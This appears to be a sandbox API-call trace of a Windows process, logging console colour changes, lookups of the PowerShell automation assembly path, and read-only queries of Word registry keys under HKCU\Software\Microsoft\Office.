[0087.110] SetConsoleTextAttribute (hConsoleOutput=0x3d7, wAttributes=0xc) returned 1
[0087.111] SetConsoleTextAttribute (hConsoleOutput=0x3d7, wAttributes=0xc) returned 1
[0087.112] SetConsoleTextAttribute (hConsoleOutput=0x3d7, wAttributes=0x7) returned 1
[0087.112] SetConsoleTextAttribute (hConsoleOutput=0x3d7, wAttributes=0x7) returned 1
[0087.114] SetConsoleTextAttribute (hConsoleOutput=0x3e3, wAttributes=0xc) returned 1
[0087.115] SetConsoleTextAttribute (hConsoleOutput=0x3e3, wAttributes=0xc) returned 1
[0087.116] SetConsoleTextAttribute (hConsoleOutput=0x3e3, wAttributes=0x7) returned 1
[0087.116] SetConsoleTextAttribute (hConsoleOutput=0x3e3, wAttributes=0x7) returned 1
[0087.118] SetConsoleTextAttribute (hConsoleOutput=0x3ef, wAttributes=0xc) returned 1
[0087.119] SetConsoleTextAttribute (hConsoleOutput=0x3ef, wAttributes=0xc) returned 1
[0087.120] SetConsoleTextAttribute (hConsoleOutput=0x3ef, wAttributes=0x7) returned 1
[0087.121] SetConsoleTextAttribute (hConsoleOutput=0x3ef, wAttributes=0x7) returned 1
[0087.123] SetConsoleTextAttribute (hConsoleOutput=0x3fb, wAttributes=0xc) returned 1
[0087.123] SetConsoleTextAttribute (hConsoleOutput=0x3fb, wAttributes=0xc) returned 1
[0087.124] SetConsoleTextAttribute (hConsoleOutput=0x3fb, wAttributes=0x7) returned 1
[0087.125] SetConsoleTextAttribute (hConsoleOutput=0x3fb, wAttributes=0x7) returned 1
[0087.127] SetConsoleTextAttribute (hConsoleOutput=0x407, wAttributes=0xc) returned 1
[0087.127] SetConsoleTextAttribute (hConsoleOutput=0x407, wAttributes=0xc) returned 1
[0087.128] SetConsoleTextAttribute (hConsoleOutput=0x407, wAttributes=0x7) returned 1
[0087.129] SetConsoleTextAttribute (hConsoleOutput=0x407, wAttributes=0x7) returned 1
[0087.130] SetConsoleTextAttribute (hConsoleOutput=0x413, wAttributes=0xc) returned 1
[0087.131] SetConsoleTextAttribute (hConsoleOutput=0x413, wAttributes=0xc) returned 1
[0087.132] SetConsoleTextAttribute (hConsoleOutput=0x413, wAttributes=0x7) returned 1
[0087.133] SetConsoleTextAttribute (hConsoleOutput=0x413, wAttributes=0x7) returned 1
[0087.134] SetConsoleTextAttribute (hConsoleOutput=0x41f, wAttributes=0xc) returned 1
[0087.135] SetConsoleTextAttribute (hConsoleOutput=0x41f, wAttributes=0xc) returned 1
[0087.136] SetConsoleTextAttribute (hConsoleOutput=0x41f, wAttributes=0x7) returned 1
[0087.137] SetConsoleTextAttribute (hConsoleOutput=0x41f, wAttributes=0x7) returned 1
[0087.138] SetConsoleTextAttribute (hConsoleOutput=0x42b, wAttributes=0xc) returned 1
[0087.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81c790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0087.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0087.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0087.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818af0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0087.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818a40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0087.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818a40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0087.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818af0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0087.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818a40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0087.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818a40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0087.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818a00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0087.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818a00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0087.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c8189b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0087.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0087.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0087.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0087.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0087.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0087.467] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x530) returned 0x0
[0087.467] RegCloseKey (hKey=0x530) returned 0x0
[0087.467] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca38 | out: phkResult=0x1c81ca38*=0x530) returned 0x0
[0087.467] RegCloseKey (hKey=0x530) returned 0x0
[0087.467] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca38 | out: phkResult=0x1c81ca38*=0x530) returned 0x0
[0087.467] RegCloseKey (hKey=0x530) returned 0x0
[0087.467] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x530) returned 0x0
[0087.467] RegCloseKey (hKey=0x530) returned 0x0
[0087.467] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x530) returned 0x0
[0087.468] RegCloseKey (hKey=0x530) returned 0x0
[0087.468] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x530) returned 0x0
[0087.468] RegCloseKey (hKey=0x530) returned 0x0
[0087.468] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca38 | out: phkResult=0x1c81ca38*=0x530) returned 0x0
[0087.468] RegCloseKey (hKey=0x530) returned 0x0
[0087.468] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca38 | out: phkResult=0x1c81ca38*=0x530) returned 0x0
[0087.468] RegCloseKey (hKey=0x530) returned 0x0
[0087.468] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x530) returned 0x0
[0087.468] RegCloseKey (hKey=0x530) returned 0x0
[0087.468] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x530) returned 0x0
[0087.468] RegCloseKey (hKey=0x530) returned 0x0
[0087.468] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x530) returned 0x0
[0087.469] RegCloseKey (hKey=0x530) returned 0x0
[0087.469] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca38 | out: phkResult=0x1c81ca38*=0x530) returned 0x0
[0087.469] RegCloseKey (hKey=0x530) returned 0x0
[0087.469] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca38 | out: phkResult=0x1c81ca38*=0x530) returned 0x0
[0087.469] RegCloseKey (hKey=0x530) returned 0x0
[0087.469] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x530) returned 0x0
[0087.469] RegCloseKey (hKey=0x530) returned 0x0
[0087.469] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x530) returned 0x0
[0087.469] RegCloseKey (hKey=0x530) returned 0x0
[0087.469] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x530) returned 0x0
[0087.469] RegCloseKey (hKey=0x530) returned 0x0
[0087.469] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca38 | out: phkResult=0x1c81ca38*=0x530) returned 0x0
[0087.469] RegCloseKey (hKey=0x530) returned 0x0
[0087.470] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca38 | out: phkResult=0x1c81ca38*=0x530) returned 0x0
[0087.470] RegCloseKey (hKey=0x530) returned 0x0
[0087.470] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x530) returned 0x0
[0087.470] RegCloseKey (hKey=0x530) returned 0x0
[0087.470] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x530) returned 0x0
[0087.470] RegCloseKey (hKey=0x530) returned 0x0
[0087.470] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x530) returned 0x0
[0087.470] RegCloseKey (hKey=0x530) returned 0x0
[0087.470] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca38 | out: phkResult=0x1c81ca38*=0x530) returned 0x0
[0087.470] RegCloseKey (hKey=0x530) returned 0x0
[0087.470] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca38 | out: phkResult=0x1c81ca38*=0x530) returned 0x0
[0087.470] RegCloseKey (hKey=0x530) returned 0x0
[0087.470] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x530) returned 0x0
[0087.471] RegCloseKey (hKey=0x530) returned 0x0
[0087.471] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x530) returned 0x0
[0087.471] RegCloseKey (hKey=0x530) returned 0x0
[0087.471] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x530) returned 0x0
[0087.471] RegCloseKey (hKey=0x530) returned 0x0
[0087.471] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca38 | out: phkResult=0x1c81ca38*=0x530) returned 0x0
[0087.471] RegCloseKey (hKey=0x530) returned 0x0
[0087.471] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca38 | out: phkResult=0x1c81ca38*=0x530) returned 0x0
[0087.471] RegCloseKey (hKey=0x530) returned 0x0
[0087.471] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x530) returned 0x0
[0087.471] RegCloseKey (hKey=0x530) returned 0x0
[0087.471] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x530) returned 0x0
[0087.471] RegCloseKey (hKey=0x530) returned 0x0
[0087.472] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x530) returned 0x0
[0087.472] RegCloseKey (hKey=0x530) returned 0x0
[0087.472] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca38 | out: phkResult=0x1c81ca38*=0x530) returned 0x0
[0087.472] RegCloseKey (hKey=0x530) returned 0x0
[0087.472] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x530) returned 0x0
[0087.472] RegCloseKey (hKey=0x530) returned 0x0
[0087.472] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x530) returned 0x0
[0087.472] RegCloseKey (hKey=0x530) returned 0x0
[0087.472] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x530) returned 0x0
[0087.472] RegCloseKey (hKey=0x530) returned 0x0
[0087.472] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x530) returned 0x0
[0087.472] RegCloseKey (hKey=0x530) returned 0x0
[0087.473] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x530) returned 0x0
[0087.473] RegCloseKey (hKey=0x530) returned 0x0
[0087.473] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x530) returned 0x0
[0087.473] RegCloseKey (hKey=0x530) returned 0x0
[0087.473] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x530) returned 0x0
[0087.473] RegCloseKey (hKey=0x530) returned 0x0
[0087.473] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x530) returned 0x0
[0087.473] RegCloseKey (hKey=0x530) returned 0x0
[0087.473] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x530) returned 0x0
[0087.473] RegCloseKey (hKey=0x530) returned 0x0
[0087.473] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x530) returned 0x0
[0087.473] RegCloseKey (hKey=0x530) returned 0x0
[0087.473] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x530) returned 0x0
[0087.474] RegCloseKey (hKey=0x530) returned 0x0
[0087.474] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x530) returned 0x0
[0087.474] RegCloseKey (hKey=0x530) returned 0x0
[0087.474] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x530) returned 0x0
[0087.474] RegCloseKey (hKey=0x530) returned 0x0
[0087.474] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x530) returned 0x0
[0087.474] RegCloseKey (hKey=0x530) returned 0x0
[0087.474] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x530) returned 0x0
[0087.474] RegCloseKey (hKey=0x530) returned 0x0
[0087.474] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x530) returned 0x0
[0087.474] RegCloseKey (hKey=0x530) returned 0x0
[0087.474] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x530) returned 0x0
[0087.474] RegCloseKey (hKey=0x530) returned 0x0
[0087.475] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x530) returned 0x0
[0087.475] RegCloseKey (hKey=0x530) returned 0x0
[0087.475] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x530) returned 0x0
[0087.475] RegCloseKey (hKey=0x530) returned 0x0
[0087.475] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x530) returned 0x0
[0087.475] RegCloseKey (hKey=0x530) returned 0x0
[0087.475] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x530) returned 0x0
[0087.475] RegCloseKey (hKey=0x530) returned 0x0
[0087.475] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x530) returned 0x0
[0087.475] RegCloseKey (hKey=0x530) returned 0x0
[0087.475] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x530) returned 0x0
[0087.475] RegCloseKey (hKey=0x530) returned 0x0
[0087.476] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x530) returned 0x0
[0087.476] RegCloseKey (hKey=0x530) returned 0x0
[0087.476] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x530) returned 0x0
[0087.476] RegCloseKey (hKey=0x530) returned 0x0
[0087.476] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x530) returned 0x0
[0087.476] RegCloseKey (hKey=0x530) returned 0x0
[0087.476] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x530) returned 0x0
[0087.476] RegCloseKey (hKey=0x530) returned 0x0
[0087.476] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x530) returned 0x0
[0087.476] RegCloseKey (hKey=0x530) returned 0x0
[0087.476] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x530) returned 0x0
[0087.476] RegCloseKey (hKey=0x530) returned 0x0
[0087.476] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x530) returned 0x0
[0087.476] RegCloseKey (hKey=0x530) returned 0x0
[0087.477] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x530) returned 0x0
[0087.477] RegCloseKey (hKey=0x530) returned 0x0
[0087.477] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x530) returned 0x0
[0087.477] RegCloseKey (hKey=0x530) returned 0x0
[0087.477] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x530) returned 0x0
[0087.477] RegCloseKey (hKey=0x530) returned 0x0
